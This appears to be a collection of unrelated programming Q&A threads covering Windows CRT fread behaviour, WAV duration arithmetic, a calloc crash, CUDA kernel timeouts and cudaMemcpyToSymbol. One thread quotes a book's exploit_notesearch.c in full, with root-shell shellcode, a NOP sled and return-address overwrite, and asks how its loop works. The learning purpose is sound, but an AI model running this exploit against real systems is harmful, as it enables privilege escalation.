I noticed that on Windows every time I issue an unbuffered fread() request with an odd length, it's split into 2 requests (as observed through procmon):
a) fread for my requested length-1
b) 2-byte fread for the last byte
This has an obvious performance overhead: two kernel requests instead of one, and so on.
Sample code, run on Windows 10:
#include <iostream>
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char* argv[]) {
    FILE* pFile;
    char* buffer;
    pFile = fopen(argv[0], "rb");
    setbuf(pFile, nullptr);
    size_t len = 3;
    buffer = (char*)malloc(sizeof(char) * len);
    if (len != fread(buffer, 1, len, pFile)) { fputs("Reading error", stderr); exit(3); }
    free(buffer);
    fclose(pFile);
    return 0;
}
This results in the following procmon reported calls:
ReadFile c:\work\cpptry\Debug\cpptry.exe SUCCESS Offset: 0, Length: 2, Priority: Normal
ReadFile c:\work\cpptry\Debug\cpptry.exe SUCCESS Offset: 2, Length: 2
It seems as if Windows is incapable of issuing odd-sized requests to the file system.
What's up with that?
This is an implementation artifact.
The MS CRT keeps all FILEs buffered even if you tell it not to. Instead, the file buffer is set to an internal buffer with space for two bytes. This allows the CRT to keep a single code path instead of two and simplifies the implementation of the fast path in fgetc and fputc.
#define fgetc(_stream) (--(_stream)->_cnt >= 0 ? 0xff & *(_stream)->_ptr++ : _filbuf(_stream))
Some of you are probably bothered by the size of the buffer (2 bytes when quasi-unbuffered), but in the _fread_nolock_s function we can find an optimization which tries to read multiples of the buffer size directly into the destination, bypassing the file buffer.
See fread.c in CRT sources:
/* calc chars to read -- (count/streambufsize) * streambufsize */
nbytes = (unsigned)(count - count % streambufsize);
...
nread = _read_nolock(_fileno(stream), data, nbytes);
Because the file buffer's size is 2, an even number of bytes is read directly into the destination, and any remaining odd byte goes through the file buffer. Sometimes there may already be bytes in the buffer that need to be transferred to the destination before the optimized read can take place.
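To illustrate the effect, here is a minimal self-contained sketch of that split (my own illustration, not the actual CRT source; FakeFile and lowlevel_read are made-up stand-ins for the file descriptor and _read_nolock/ReadFile):
#include <cstddef>
#include <cstdio>
#include <cstring>

// Sketch only: how a "quasi unbuffered" fread of count bytes gets split when
// the stream's internal buffer (_charbuf) is just 2 bytes wide.
struct FakeFile { const char* data; size_t size; size_t pos; };

static size_t lowlevel_read(FakeFile& f, void* dst, size_t n)   // stand-in for _read_nolock
{
    size_t avail = f.size - f.pos;
    if (n > avail) n = avail;
    std::memcpy(dst, f.data + f.pos, n);
    std::printf("ReadFile: Offset: %zu, Length: %zu\n", f.pos, n);
    f.pos += n;
    return n;
}

static size_t sketch_fread(FakeFile& f, char* dst, size_t count)
{
    const size_t streambufsize = 2;                 // forced to 2 for _IONBF streams
    size_t nbytes = count - count % streambufsize;  // largest even prefix
    size_t total = lowlevel_read(f, dst, nbytes);   // read directly into the destination

    if (count > nbytes)                             // odd remainder: at most one byte
    {
        char charbuf[2];                            // the 2-byte stream buffer
        size_t got = lowlevel_read(f, charbuf, 2);  // refill it: the extra 2-byte request
        if (got > 0) { dst[nbytes] = charbuf[0]; ++total; }
    }
    return total;
}

int main()
{
    const char data[] = "ABCDEFG";
    FakeFile f = { data, sizeof data - 1, 0 };
    char out[3];
    std::printf("read %zu bytes\n", sketch_fread(f, out, 3)); // two 2-byte "ReadFile" calls
    return 0;
}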
Bonus: the buffer size is always forced to be a multiple of 2.
See setvbuf.c:
/*
 * force size to be even by masking down to the nearest multiple
 * of 2
 */
size &= (size_t)~1;
...
/*
 * CASE 1: No Buffering.
 */
if (type & _IONBF) {
    stream->_flag |= _IONBF;
    buffer = (char *)&(stream->_charbuf);
    size = 2;
}
The code snippets above are from the VC 2013 CRT.
For comparison, here are snippets from the Universal CRT 10.0.17134:
read.cpp
unsigned const bytes_to_read = stream_buffer_size != 0
    ? static_cast<unsigned>(maximum_bytes_to_read - maximum_bytes_to_read % stream_buffer_size)
    : maximum_bytes_to_read;
...
int const bytes_read = _read_nolock(_fileno(stream.public_stream()), data, bytes_to_read);
setvbuf.cpp
// Force the buffer size to be even by masking the low order bit:
size_t const usable_buffer_size = buffer_size_in_bytes & ~static_cast<size_t>(1);
...
// Case 1: No buffering:
if (type & _IONBF)
{
    return set_buffer(stream, reinterpret_cast<char*>(&stream->_charbuf), 2, _IOBUFFER_NONE);
}
And here are snippets from VC 6.0 (1998):
read.c
/* calc chars to read -- (count/bufsize) * bufsize */
nbytes = ( bufsize ? (count - count % bufsize) : count );
nread = _read(_fileno(stream), data, nbytes);
setvbuf.c
/*
 * force size to be even by masking down to the nearest multiple
 * of 2
 */
size &= (size_t)~1;
...
/*
 * CASE 1: No Buffering.
 */
if (type & _IONBF) {
    stream->_flag |= _IONBF;
    buffer = (char *)&(stream->_charbuf);
    size = 2;
}
Related
I've been focused on this book for several years, trying to get through it slowly but surely by understanding all of the details. However, I've come to a roadblock with a specific line of code in the exploit_notesearch.c program source file. The for loop on line 24 reads, "for(i = 0; i < 160; i += 4)".
The entire program source code block is as follows:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[] =
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[]) {
    unsigned int i, *ptr, ret, offset = 270;
    char *command, *buffer;
    command = (char *) malloc(200);
    bzero(command, 200); // Zero out the new memory.
    strcpy(command, "./notesearch \'"); // Start command buffer.
    buffer = command + strlen(command); // Set buffer at the end.
    if (argc > 1) // Set offset.
        offset = atoi(argv[1]);
    ret = (unsigned int) &i - offset; // Set return address.
    for (i = 0; i < 160; i += 4) // Fill buffer with return address.
        *((unsigned int *) (buffer + i)) = ret;
    memset(buffer, 0x90, 60); // Build NOP sled.
    memcpy(buffer + 60, shellcode, sizeof(shellcode) - 1);
    strcat(command, "\'");
    system(command); // Run exploit.
    free(command);
}
What I don't understand about this line of code is the specific value of 160 chosen by the author. Why is the value 160? Can someone please explain the logic to me?
Going through GDB, I figured out that changing the value from 160 to a lower value keeps the starting location of the NOP sled in the buffer the same; however, fewer bytes are written to memory. With fewer bytes written, the target's return address may or may not be overwritten, since the repeated return address may not reach far enough to hit it; this depends on how much the value is lowered, if I understand correctly. What still confuses me is that the comment itself states that the loop fills the buffer with the return address. To me, this makes it seem like the value 160 fills the entire buffer, but I'm just not sure. I do not understand the logic.
I even counted the length of the shellcode (35 bytes) and added it to the length of the initial command (15 bytes, not including the escape character), coming to a value of 50. Adding that to 160 gives 210, which definitely doesn't make sense to me, since 210 would be beyond the allocated heap size of 200.
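For reference, here is my own accounting of how the malloc(200) block is laid out by the code above (just arithmetic on the listing, not an explanation from the book):
// Layout of the 200-byte command buffer (my own accounting; "./notesearch '" is 14 bytes):
//
//   command[0..13]   "./notesearch '"                               14 bytes
//   buffer[0..159]   loop writes ret 40 times (i = 0, 4, ..., 156)  160 bytes
//   buffer[0..59]    ...then overwritten with NOPs (memset 0x90)     60 bytes
//   buffer[60..94]   ...then overwritten with the 35-byte shellcode
//   buffer[95..159]  the repeated return address survives here
//   buffer[160]      closing quote appended by strcat                 1 byte
//   buffer[161]      terminating NUL                                  1 byte
//
// Total: 14 + 160 + 1 + 1 = 176 bytes, which fits within the 200-byte allocation.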
I guess my main question is what is the relationship between the value 160 as it is used in the loop and the size of the buffer?
Secondly, is there any relationship between the value 160 and the 200 bytes allocated on the heap?
Lastly, why do we require two separate pointer variables used in exploit_notesearch.c? Specifically, a *command variable and *buffer variable? Couldn't we simply use one of them?
Any assistance is greatly appreciated.
I am reading data from a RIFF WAV file. I have an array DataBuffer holding the data chunk of the WAV file. How can I convert the number of bytes of data read into the number of seconds read from the WAV file?
int size_buffer = (Subchunk2Size / (NumOfChan * bitsPerSample / 8));
FILE* WavResult = fopen(FileNom, "rb");
u8* DataBuffer = new u8[size_buffer];
size_t nRead = fread(DataBuffer, sizeof DataBuffer[0], size_buffer, WavResult);
I think you mixed things up a bit. Assuming the field names in the WAV header are as described at http://soundfile.sapp.org/doc/WaveFormat :
ChunkID - "RIFF"
ChunkSize
Format - "WAVE"
Subchunk1ID - "fmt "
Subchunk1Size
AudioFormat
NumChannels
SampleRate
ByteRate
BlockAlign
BitsPerSample
Subchunk2ID - "data"
Subchunk2Size
data
This line of yours:
int size_buffer = (Subchunk2Size / (NumOfChan * bitsPerSample / 8));
calculates the number of samples in a single channel, or equivalently the number of blocks, where a block is a structure that contains one sample for each channel. If you use that to allocate memory for the bytes of the data chunk, it will only be enough in the case of 8-bit mono audio.
If allocating memory for bytes is really what you want, then simply use Subchunk2Size as the size.
If you want to allocate memory for samples, then it will differ depending on whether the audio is 8-bit or 16-bit (I'm ignoring other possibilities). For 8-bit:
const uint32_t num_of_samples = Subchunk2Size / (BitsPerSample / 8);
uint8_t *samples = new uint8_t[num_of_samples];
and for 16-bit:
const uint32_t num_of_samples = Subchunk2Size / (BitsPerSample / 8);
int16_t *samples = new int16_t[num_of_samples];
Personally, I'd rather use std::vector instead of c-arrays:
const uint32_t num_of_samples = Subchunk2Size / (BitsPerSample / 8);
std::vector<int16_t> samples;
samples.resize(num_of_samples); // could be done in the constructor, but I am afraid of vector constructors ;-)
I also assume here that the audio is in the most popular encoding (I think), i.e., unsigned for 8-bit and signed for 16-bit. I'm also ignoring the issue of endianness.
But back to the number of seconds. We can calculate that using the total number of blocks and SampleRate. SampleRate tells us how many samples (in a single channel) there are per second, or in other words, how many blocks there are per second. So the number of seconds is:
const double num_of_seconds = 1.0 * num_of_blocks / SampleRate;
You can calculate the number of blocks using the formula from your first line:
const uint32_t num_of_blocks = Subchunk2Size / (NumChannels * BitsPerSample / 8);
or, as we already have num_of_samples, which is the total number of samples from all channels, we can just divide that by NumChannels:
const uint32_t num_of_blocks = num_of_samples / NumChannels;
And lastly, in case all you really wanted was just to get the number of seconds from the number of bytes, there are two options. You can calculate the block size:
const int block_size = NumChannels * BitsPerSample / 8;
which should be essentially the same as BlockAlign, then divide Subchunk2Size by it to get the number of blocks, and divide again by SampleRate to get the number of seconds:
const double num_of_seconds = 1.0 * Subchunk2Size / block_size / SampleRate;
// or
const double num_of_seconds = 1.0 * Subchunk2Size / BlockAlign / SampleRate;
Or you can use ByteRate, which is the number of bytes per second:
const double num_of_seconds = 1.0 * Subchunk2Size / ByteRate;
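Putting the pieces together, here is a minimal self-contained sketch (the header values are made-up examples; in real code they would come from parsing the fields listed above):
#include <cstdint>
#include <cstdio>

int main()
{
    // Example header values (made up for illustration; normally parsed from the file).
    const uint16_t NumChannels   = 2;        // stereo
    const uint32_t SampleRate    = 44100;    // blocks (frames) per second
    const uint16_t BitsPerSample = 16;
    const uint32_t Subchunk2Size = 1764000;  // size of the data chunk in bytes

    const uint32_t block_size     = NumChannels * BitsPerSample / 8;  // same as BlockAlign
    const uint32_t num_of_blocks  = Subchunk2Size / block_size;
    const double   num_of_seconds = 1.0 * num_of_blocks / SampleRate;

    std::printf("%u blocks of %u bytes -> %.3f seconds\n",
                num_of_blocks, block_size, num_of_seconds);  // prints 10.000 seconds
    return 0;
}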
typedef struct
{
    long nIndex; // object index
    TCHAR path[3 * MAX_TEXT_FIELD_SIZE];
} structItems;

void method1(LPCTSTR pInput, LPTSTR pOutput, size_t iSizeOfOutput)
{
    size_t iLength = 0;
    iLength = _tcslen(pInput);
    if (iLength > iSizeOfOutput + sizeof(TCHAR))
        iLength = iSizeOfOutput - sizeof(TCHAR);
    memset(pOutput, 0, iSizeOfOutput); // Access violation error
}

void main()
{
    CString csSysPath = _T("fghjjjjjjjjjjjjjjjj");
    structItems *pIndexSyspath = nullptr;
    pIndexSyspath = (structItems *)calloc(1, sizeof(structItems) * 15555555); // If I put the size as 1555555 then it works well
    method1(csSysPath, pIndexSyspath[0].path, (sizeof(TCHAR) * (3 * MAX_TEXT_FIELD_SIZE)));
}
This is sample code which causes the crash.
In the above code, if we use the size 1555555 then it works well (I randomly decreased the size by one digit).
This is a 32-bit application running on a 64-bit Windows OS with 16 GB of RAM.
I kindly request someone to help me understand the reason for the failure and the relation between calloc, the size, and memset.
typedef struct
{
    long nIndex;                          // 4 bytes on Windows
    TCHAR path[3 * MAX_TEXT_FIELD_SIZE];  // 1 * 3 * 255 bytes for non-unicode
} structItems;
Supposing non-Unicode, TCHAR is 1 byte and MAX_TEXT_FIELD_SIZE is 255, so sizeof(structItems) is 255*3 + 4, which is 769 bytes per struct. Now, you want to allocate sizeof(structItems) * 15555555, which is more than 11 GiB. That cannot fit into the 2 GiB of address space available to a 32-bit process, so calloc fails and returns NULL. Since the code never checks the result, pIndexSyspath[0].path is an address near NULL, and the memset inside method1 writes through it, which is the access violation you see.
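Here is a minimal sketch of the missing failure check (MAX_TEXT_FIELD_SIZE is assumed to be 255, as in the discussion above):
#include <cstdio>
#include <cstdlib>
#include <tchar.h>

#define MAX_TEXT_FIELD_SIZE 255   // assumed value for this sketch

typedef struct
{
    long nIndex;
    TCHAR path[3 * MAX_TEXT_FIELD_SIZE];
} structItems;

int main()
{
    // calloc cannot satisfy a request of this size in a 32-bit process, so it
    // returns NULL; without this check, pIndexSyspath[0].path is an address
    // near NULL and the memset inside method1 faults with an access violation.
    structItems *pIndexSyspath = (structItems *)calloc(15555555, sizeof(structItems));
    if (pIndexSyspath == nullptr)
    {
        std::fprintf(stderr, "calloc failed: request exceeds the available address space\n");
        return EXIT_FAILURE;
    }

    /* ... use pIndexSyspath ... */
    free(pIndexSyspath);
    return 0;
}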
What do I need to change in my program to be able to compute a higher limit of prime numbers?
Currently my algorithm only works with numbers up to 85 million; in my opinion, it should work with numbers up to 3 billion.
I'm writing my own implementation of the Sieve of Eratosthenes in CUDA and I've hit a wall.
So far the algorithm seems to work fine for small numbers (below 85 million).
However, when I try to compute prime numbers up to 100 million, 2 billion, or 3 billion, the system freezes (while it's computing on the CUDA device); then, after a few seconds, my Linux machine goes back to normal (unfrozen), but the CUDA program crashes with the following error message:
CUDA error at prime.cu:129 code=6(cudaErrorLaunchTimeout) "cudaDeviceSynchronize()"
I have a GTX 780 (3 GB) and I'm allocating the sieve in a char array, so if I were to compute prime numbers up to 100,000, it would allocate 100,000 bytes on the device.
I assumed that the GPU would allow up to 3 billion numbers since it has 3 GB of memory; however, it only lets me do 85 million tops (85 million bytes = 0.08 GB).
this is my prime.cu code:
#include <stdio.h>
#include <helper_cuda.h> // checkCudaErrors() - NVIDIA_CUDA-6.0_Samples/common/inc
// #include <cuda.h>
// #include <cuda_runtime_api.h>
// #include <cuda_runtime.h>

typedef unsigned long long int uint64_t;

/******************************************************************************
 * kernel that initializes the 1st couple of values in the primes array.
 ******************************************************************************/
__global__ static void sieveInitCUDA(char* primes)
{
    primes[0] = 1; // value of 1 means the number is NOT prime
    primes[1] = 1; // numbers "0" and "1" are not prime numbers
}

/******************************************************************************
 * kernel for sieving the even numbers starting at 4.
 ******************************************************************************/
__global__ static void sieveEvenNumbersCUDA(char* primes, uint64_t max)
{
    uint64_t index = blockIdx.x * blockDim.x + threadIdx.x + threadIdx.x + 4;
    if (index < max)
        primes[index] = 1;
}

/******************************************************************************
 * kernel for finding prime numbers using the sieve of eratosthenes
 * - primes: an array of bools. initially all numbers are set to "0".
 *   A "0" value means that the number at that index is prime.
 * - max: the max size of the primes array
 * - maxRoot: the sqrt of max (the other input). we don't wanna make all threads
 *   compute this over and over again, so it's being passed in
 ******************************************************************************/
__global__ static void sieveOfEratosthenesCUDA(char *primes, uint64_t max,
                                               const uint64_t maxRoot)
{
    // get the starting index, sieve only odds starting at 3
    // 3,5,7,9,11,13...
    /* int index = blockIdx.x * blockDim.x + threadIdx.x + threadIdx.x + 3; */

    // apparently the following indexing usage is faster than the one above. Hmm
    int index = blockIdx.x * blockDim.x + threadIdx.x + 3;

    // make sure index won't go out of bounds, also don't start the execution
    // on numbers that are already composite
    if (index < maxRoot && primes[index] == 0)
    {
        // mark off the composite numbers
        for (int j = index * index; j < max; j += index)
        {
            primes[j] = 1;
        }
    }
}

/******************************************************************************
 * checkDevice()
 ******************************************************************************/
__host__ int checkDevice()
{
    // query the Device and decide on the block size
    int devID = 0; // the default device ID
    cudaError_t error;
    cudaDeviceProp deviceProp;
    error = cudaGetDevice(&devID);
    if (error != cudaSuccess)
    {
        printf("CUDA Device not ready or not supported\n");
        printf("%s: cudaGetDevice returned error code %d, line(%d)\n", __FILE__, error, __LINE__);
        exit(EXIT_FAILURE);
    }
    error = cudaGetDeviceProperties(&deviceProp, devID);
    if (deviceProp.computeMode == cudaComputeModeProhibited || error != cudaSuccess)
    {
        printf("CUDA device ComputeMode is prohibited or failed to getDeviceProperties\n");
        return EXIT_FAILURE;
    }
    // Use a larger block size for Fermi and above (see compute capability)
    return (deviceProp.major < 2) ? 16 : 32;
}

/******************************************************************************
 * genPrimesOnDevice
 * - inputs: limit - the largest prime that should be computed
 *           primes - an array of size [limit], initialized to 0
 ******************************************************************************/
__host__ void genPrimesOnDevice(char* primes, uint64_t max)
{
    int blockSize = checkDevice();
    if (blockSize == EXIT_FAILURE)
        return;

    char* d_Primes = NULL;
    int sizePrimes = sizeof(char) * max;
    uint64_t maxRoot = sqrt(max);

    // allocate the primes on the device and set them to 0
    checkCudaErrors(cudaMalloc(&d_Primes, sizePrimes));
    checkCudaErrors(cudaMemset(d_Primes, 0, sizePrimes));

    // make sure that there are no errors...
    checkCudaErrors(cudaPeekAtLastError());

    // setup the execution configuration
    dim3 dimBlock(blockSize);
    dim3 dimGrid((maxRoot + dimBlock.x) / dimBlock.x);
    dim3 dimGridEvens(((max + dimBlock.x) / dimBlock.x) / 2);

    //////// debug
#ifdef DEBUG
    printf("dimBlock(%d, %d, %d)\n", dimBlock.x, dimBlock.y, dimBlock.z);
    printf("dimGrid(%d, %d, %d)\n", dimGrid.x, dimGrid.y, dimGrid.z);
    printf("dimGridEvens(%d, %d, %d)\n", dimGridEvens.x, dimGridEvens.y, dimGridEvens.z);
#endif

    // call the kernel
    // NOTE: no need to synchronize after each kernel
    // http://stackoverflow.com/a/11889641/2261947
    sieveInitCUDA<<<1, 1>>>(d_Primes); // launch a single thread to initialize
    sieveEvenNumbersCUDA<<<dimGridEvens, dimBlock>>>(d_Primes, max);
    sieveOfEratosthenesCUDA<<<dimGrid, dimBlock>>>(d_Primes, max, maxRoot);

    // check for kernel errors
    checkCudaErrors(cudaPeekAtLastError());
    checkCudaErrors(cudaDeviceSynchronize());

    // copy the results back
    checkCudaErrors(cudaMemcpy(primes, d_Primes, sizePrimes, cudaMemcpyDeviceToHost));

    // no memory leaks
    checkCudaErrors(cudaFree(d_Primes));
}
To test this code:
#include <iostream> // for std::cout
#include <cstdlib>  // for malloc/free
#include <cstring>  // for memset

int main()
{
    uint64_t max = 85000000; // 85 million
    char* primes = (char*)malloc(max);
    // check that it allocated correctly...
    memset(primes, 0, max);

    genPrimesOnDevice(primes, max);

    // if you wish to display results:
    for (uint64_t i = 0; i < max; i++)
    {
        if (primes[i] == 0) // if the value is '0', then the number is prime
        {
            std::cout << i; // use printf if you are using C
            if ((i + 1) != max)
                std::cout << ", ";
        }
    }

    free(primes);
}
This error:
CUDA error at prime.cu:129 code=6(cudaErrorLaunchTimeout) "cudaDeviceSynchronize()"
doesn't necessarily mean anything other than that your kernel is taking too long. It's not necessarily a numerical limit or a computational error, but a system-imposed limit on the amount of time your kernel is allowed to run. Both Linux and Windows can have such watchdog timers.
If you want to work around it in the Linux case, review this document.
You don't mention it, but I assume your GTX780 is also hosting a (the) display. In that case, there is a time limit on kernels by default. If you can use another device as the display, then reconfigure your machine to have X not use the GTX780, as described in the link. If you do not have another GPU to use for the display, then the only option is to modify the interactivity setting indicated in the linked document, if you want to run long-running kernels. And in this situation, the keyboard/mouse/display will become non-responsive while the kernel is running. If your kernel should happen to run too long, it can be difficult to recover the machine, and may require a hard reboot. (You could also SSH into the machine, and kill the process that is using the GPU for CUDA.)
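As a quick way to confirm whether the watchdog applies to your device, you can query the kernelExecTimeoutEnabled property (a small host-side sketch using the CUDA runtime API):
#include <cstdio>
#include <cuda_runtime.h>

// Sketch: report whether the display watchdog (run-time limit on kernels) is
// enabled for each CUDA device. If it is, long-running kernels are killed
// with cudaErrorLaunchTimeout.
int main()
{
    int count = 0;
    if (cudaGetDeviceCount(&count) != cudaSuccess || count == 0)
    {
        std::printf("no CUDA devices found\n");
        return 1;
    }
    for (int dev = 0; dev < count; ++dev)
    {
        cudaDeviceProp prop;
        if (cudaGetDeviceProperties(&prop, dev) != cudaSuccess)
            continue;
        std::printf("device %d (%s): kernelExecTimeoutEnabled = %d\n",
                    dev, prop.name, prop.kernelExecTimeoutEnabled);
    }
    return 0;
}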
Suppose we have:
struct collapsed {
    char **seq;
    int num;
};
...
__device__ collapsed *xdev;
...
collapsed *x_dev;
cudaGetSymbolAddress((void **)&x_dev, xdev);
cudaMemcpyToSymbol(x_dev, x, sizeof(collapsed)*size); // x is already defined as collapsed *; this line gives the ERROR
Why do you think I am getting the error "invalid device symbol" at the last line?
The first problem here is that x_dev isn't a device symbol. It might contain an address in device memory, but that address cannot be passed to cudaMemcpyToSymbol. The call should just be:
cudaMemcpyToSymbol(xdev, ......);
Which brings up the second problem. Doing this:
cudaMemcpyToSymbol(xdev, x, sizeof(collapsed)*size);
would be illegal. xdev is a pointer, so the only valid value you can copy to xdev is a device address. If x is the address of a struct collapsed in device memory, then the only valid version of this memory transfer operation is
cudaMemcpyToSymbol(xdev, &x, sizeof(collapsed *));
i.e. x must previously have been set to the address of memory allocated on the device, something like:
collapsed *x;
cudaMalloc((void **)&x, sizeof(collapsed)*size);
cudaMemcpy(x, host_src, sizeof(collapsed)*size, cudaMemcpyHostToDevice);
As promised, here is a complete working example. First the code:
#include <cstdlib>
#include <iostream>
#include <string>
#include <cuda_runtime.h>

struct collapsed {
    char **seq;
    int num;
};

__device__ collapsed xdev;

__global__
void kernel(const size_t item_sz)
{
    if (threadIdx.x < xdev.num) {
        char *p = xdev.seq[threadIdx.x];
        char val = 0x30 + threadIdx.x;
        for(size_t i=0; i<item_sz; i++) {
            p[i] = val;
        }
    }
}

#define gpuQ(ans) { gpu_assert((ans), __FILE__, __LINE__); }
void gpu_assert(cudaError_t code, const char *file, const int line)
{
    if (code != cudaSuccess)
    {
        std::cerr << "gpu_assert: " << cudaGetErrorString(code) << " "
                  << file << " " << line << std::endl;
        exit(code);
    }
}

int main(void)
{
    const int nitems = 32;
    const size_t item_sz = 16;
    const size_t buf_sz = size_t(nitems) * item_sz;

    // Gpu memory for sequences
    char *_buf;
    gpuQ( cudaMalloc((void **)&_buf, buf_sz) );
    gpuQ( cudaMemset(_buf, 0x7a, buf_sz) );

    // Host array for holding sequence device pointers
    char **seq = new char*[nitems];
    size_t offset = 0;
    for(int i=0; i<nitems; i++, offset += item_sz) {
        seq[i] = _buf + offset;
    }

    // Device array holding sequence pointers
    char **_seq;
    size_t seq_sz = sizeof(char*) * size_t(nitems);
    gpuQ( cudaMalloc((void **)&_seq, seq_sz) );
    gpuQ( cudaMemcpy(_seq, seq, seq_sz, cudaMemcpyHostToDevice) );

    // Host copy of the xdev structure to copy to the device
    collapsed xdev_host;
    xdev_host.num = nitems;
    xdev_host.seq = _seq;

    // Copy to device symbol
    gpuQ( cudaMemcpyToSymbol(xdev, &xdev_host, sizeof(collapsed)) );

    // Run Kernel
    kernel<<<1,nitems>>>(item_sz);

    // Copy back buffer
    char *buf = new char[buf_sz];
    gpuQ( cudaMemcpy(buf, _buf, buf_sz, cudaMemcpyDeviceToHost) );

    // Print out seq values
    // Each string should be ASCII starting from '0' (0x30)
    char *seq_vals = buf;
    for(int i=0; i<nitems; i++, seq_vals += item_sz) {
        std::string s;
        s.append(seq_vals, item_sz);
        std::cout << s << std::endl;
    }
    return 0;
}
and here it is compiled and run:
$ /usr/local/cuda/bin/nvcc -arch=sm_12 -Xptxas=-v -g -G -o erogol erogol.cu
./erogol.cu(19): Warning: Cannot tell what pointer points to, assuming global memory space
ptxas info : 8 bytes gmem, 4 bytes cmem[14]
ptxas info : Compiling entry function '_Z6kernelm' for 'sm_12'
ptxas info : Used 5 registers, 20 bytes smem, 4 bytes cmem[1]
$ /usr/local/cuda/bin/cuda-memcheck ./erogol
========= CUDA-MEMCHECK
0000000000000000
1111111111111111
2222222222222222
3333333333333333
4444444444444444
5555555555555555
6666666666666666
7777777777777777
8888888888888888
9999999999999999
::::::::::::::::
;;;;;;;;;;;;;;;;
<<<<<<<<<<<<<<<<
================
>>>>>>>>>>>>>>>>
????????????????
@@@@@@@@@@@@@@@@
AAAAAAAAAAAAAAAA
BBBBBBBBBBBBBBBB
CCCCCCCCCCCCCCCC
DDDDDDDDDDDDDDDD
EEEEEEEEEEEEEEEE
FFFFFFFFFFFFFFFF
GGGGGGGGGGGGGGGG
HHHHHHHHHHHHHHHH
IIIIIIIIIIIIIIII
JJJJJJJJJJJJJJJJ
KKKKKKKKKKKKKKKK
LLLLLLLLLLLLLLLL
MMMMMMMMMMMMMMMM
NNNNNNNNNNNNNNNN
OOOOOOOOOOOOOOOO
========= ERROR SUMMARY: 0 errors
Some notes:
To simplify things a bit, I have only used a single memory allocation _buf to hold all of the string data. Each value of seq is set to a different address within _buf. This is functionally equivalent to running a separate cudaMalloc call for each pointer, but much faster.
The key concept is to assemble a copy of the structure you wish to access on the device in host memory, then copy that to the device. All of the pointers in my xdev_host are device pointers. The CUDA API doesn't have any sort of deep copy or automatic pointer translation facility, so it is the programmer's responsibility to make sure this is correct.
Each thread in the kernel just fills its sequence with a different ASCII character. Note that I have declared my xdev as a structure rather than a pointer to a structure, and I copy values rather than a reference to the __device__ symbol (again to simplify things slightly). But otherwise the sequence of operations is what you would need to make your design pattern work.
Because I only have access to a compute 1.x device, the compiler issues a warning. On compute 2.x and 3.x devices this won't happen because of the improved memory model in those devices. The warning is normal and can be safely ignored.
Because each sequence is just written into a different part of _buf, I can transfer all the sequences back to the host with a single cudaMemcpy call.